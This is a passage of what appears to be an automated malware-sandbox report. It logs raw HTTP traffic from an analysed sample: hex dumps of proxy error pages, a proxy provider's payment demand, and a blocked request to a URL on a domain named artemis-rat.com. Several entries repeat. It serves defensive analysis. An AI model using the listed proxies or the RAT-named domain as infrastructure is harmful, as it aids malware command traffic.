78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:06 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:07 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:15:07 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.6Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:07 GMTContent-Type: text/html;charset=utf-8Content-Length: 3773X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERRO
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:08 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: closeData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:08 GMTContent-Type: text/html;charset=utf-8Content-Length: 3699X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from hostX-Cache-Lookup: NONE from host:3128Connection: closeData Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e d0 9e d0 a8 d0 98 d0 91 d0 9a d0 90 3a 20 d0 97 d0 b0 d0 bf d1 80 d0 be d1 88 d0 b5 d0 bd d0 bd d1 8b d0 b9 20 55 52 4c 20 d0 bd d0 b5 20 d0 bc d0 be d0 b6 d0 b5 d1 82 20 d0 b1 d1 8b d1 82 d1 8c 20 d0 Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>: URL
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:08 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:09 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53
